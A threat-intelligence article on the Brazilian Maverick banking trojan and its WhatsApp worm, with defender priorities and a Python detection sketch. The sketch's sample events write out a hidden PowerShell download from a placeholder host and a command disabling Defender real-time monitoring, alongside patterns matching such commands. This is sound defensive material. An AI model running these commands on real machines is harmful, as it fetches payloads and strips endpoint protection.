Maverick Malware
Threat hunters have identified a strong operational and technical overlap between the newly publicised banking trojan dubbed 'Maverick' and an earlier Brazilian trojan known as 'Coyote'. Analysis shows that both families are .NET-based, focusing on Brazilian banks and users, and use similar routines to decrypt and monitor banking URLs and applications. Both include a WhatsApp Web propagation component.
The WhatsApp Vector and the SORVEPOTEL Worm
The campaign's mass-propagation mechanism is a self-spreading component tracked as 'SORVEPOTEL' that abuses WhatsApp Web. Victims receive a phishing-style ZIP file (often masquerading as a receipt or legitimate document); the archive contains a malicious Windows shortcut (.LNK) or an obfuscated VBS which, when executed on a desktop, launches cmd.exe or PowerShell to pull the next-stage payload. The worm then hijacks the victim's WhatsApp Web session by copying the user's Chrome profile (cookies, tokens, and session data) and uses browser automation to send the same ZIP file to the victim's contacts and groups.
The Dropper, Loader, and Hardening Against Analysis
Investigations show the ZIP typically contains an LNK that triggers a PowerShell chain, which connects to an attacker-controlled host to download a first-stage payload. That staging PowerShell has routines that launch intermediate tools to disable Microsoft Defender and UAC and to fetch a .NET loader. The loader performs anti-analysis checks for reverse-engineering tools and self-terminates if a hostile environment is detected, then downloads the campaign's main modules — the WhatsApp worm (SORVEPOTEL) and the Maverick banking modules.
Brazil-Only Gating and Expanded Victimology
Maverick includes explicit geo/locale gating, which validates time zone, system language, regional settings, and date/time format before installing the banking payload, ensuring execution primarily on Portuguese-language machines in Brazil. Beyond banks, there are signs that operators have singled out hospitality targets, such as hotels in Brazil, suggesting a focus on sectors beyond retail banking. The campaign leverages Brazil's huge WhatsApp footprint — roughly 148 million users — which fuels its rapid spread.
What the Malware Can Do — Supported Commands
Once installed, the backdoor exposes a broad feature set enabling reconnaissance, file operations, process control, and system manipulation. The commands reported in vendor technical write-ups include the following selection:
- INFO (collect system information)
- CMD (run a command via cmd.exe and capture output)
- POWERSHELL (execute PowerShell)
- SCREENSHOT (capture screen)
- TASKLIST (enumerate processes)
- KILL (terminate a process)
- LIST_FILES / SEARCH (enumerate and search files)
- DOWNLOAD_FILE / UPLOAD_FILE (exfiltrate or fetch files)
- MOVE / COPY / RENAME / DELETE / FILE_INFO (file operations and metadata)
- CREATE_FOLDER (create directories)
- REBOOT / SHUTDOWN (restart or power off with delay)
- UPDATE (self-update)
- CHECK_EMAIL (poll attacker mailbox for new C2 URLs)
These capabilities enable operators to harvest credentials, stage phishing overlays, take screenshots, and manipulate the endpoint for fraud and lateral movement.
What Defenders Should Prioritise
Practically speaking, organisations and users in Brazil (and those with Brazil-facing customers) should prioritise:
- blocking and monitoring execution of downloaded LNK and VBS files from messaging platforms;
- enforcing endpoint controls that prevent unsigned PowerShell execution and block common automation tools where not required;
- ensuring Defender/EDR protections are hardened against tampering;
- monitoring anomalous outbound mail/IMAP activity that could indicate attacker-controlled mailboxes being polled for C2.
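As an added illustration of the first three priorities (not code from the write-up or any vendor), the following hunt sketch scores Sysmon-style process-creation events for the delivery chain described above: a script interpreter spawned by explorer.exe from a user drop folder (a double-clicked LNK or VBS), a PowerShell download cradle, and a Defender tamper command. The field names, folder list, regexes and the sample events are assumptions constructed for this example.

```python
import re

# Field names follow Sysmon Event ID 1 (process creation); all events below are constructed.
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
USER_DROP_DIR = re.compile(r"\\(Downloads|Desktop|WhatsApp|Temp)\\", re.IGNORECASE)
LURE_SCRIPT = re.compile(r"\.vbs\b", re.IGNORECASE)
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.IGNORECASE)
DEFENDER_TAMPER = re.compile(
    r"Set-MpPreference\s.*-Disable\w*Monitoring|Add-MpPreference\s.*-Exclusion", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return the reasons an event matches the SORVEPOTEL delivery chain; [] means no match."""
    image, parent = basename(ev.get("Image", "")), basename(ev.get("ParentImage", ""))
    cmdline, cwd = ev.get("CommandLine", ""), ev.get("CurrentDirectory", "")
    reasons = []
    # A double-clicked LNK makes explorer.exe spawn the shortcut's target directly, so the .lnk
    # name never appears in the child's command line; the working directory is the better signal.
    if image in INTERPRETERS and parent == "explorer.exe" and (
            USER_DROP_DIR.search(cwd) or LURE_SCRIPT.search(cmdline)):
        reasons.append("script interpreter launched by explorer.exe from a user drop folder (LNK/VBS lure)")
    if image in {"cmd.exe", "powershell.exe", "pwsh.exe"} and DOWNLOAD_CRADLE.search(cmdline):
        reasons.append("PowerShell download cradle in command line")
    if DEFENDER_TAMPER.search(cmdline):
        reasons.append("Microsoft Defender tamper attempt")
    return reasons


def hunt(events):
    """Map ProcessId -> reasons for every event that matched at least one check."""
    scored = {ev["ProcessId"]: score_event(ev) for ev in events}
    return {pid: reasons for pid, reasons in scored.items() if reasons}


SAMPLE_EVENTS = [  # constructed; the .invalid host is a placeholder, not a real indicator
    {"ProcessId": 101, "Image": "C:\\Windows\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "notepad.exe recibo.txt", "CurrentDirectory": "C:\\Users\\ana\\Downloads\\"},
    {"ProcessId": 102, "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": 'cmd.exe /c powershell -w hidden -c "Invoke-WebRequest http://stage.invalid/s1 -OutFile %TEMP%\\s1.ps1"',
     "CurrentDirectory": "C:\\Users\\ana\\Downloads\\"},
    {"ProcessId": 103, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true",
     "CurrentDirectory": "C:\\Windows\\Temp\\"},
    {"ProcessId": 104, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe Get-Process",
     "CurrentDirectory": "C:\\Users\\ana\\Documents\\"},
]

if __name__ == "__main__":
    for pid, reasons in hunt(SAMPLE_EVENTS).items():
        print(pid, reasons)
```

The drop-folder check will also fire on an administrator who launches PowerShell from the Desktop, so in production it should be combined with the other two signals or tuned to the environment.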
Key Takeaways
- Maverick is a sophisticated, Brazil-focused banking trojan delivered via a self-propagating WhatsApp worm (SORVEPOTEL).
- Multiple vendors agree that Maverick shares code and tactics with the earlier Coyote family, but treat it as a new, actively evolving threat.
- The campaign combines WhatsApp automation, browser profile theft, PowerShell-based loaders, and an email-based C2 for resilience and operator control — a combination that enables rapid, wide-scale propagation and stealthy banking fraud.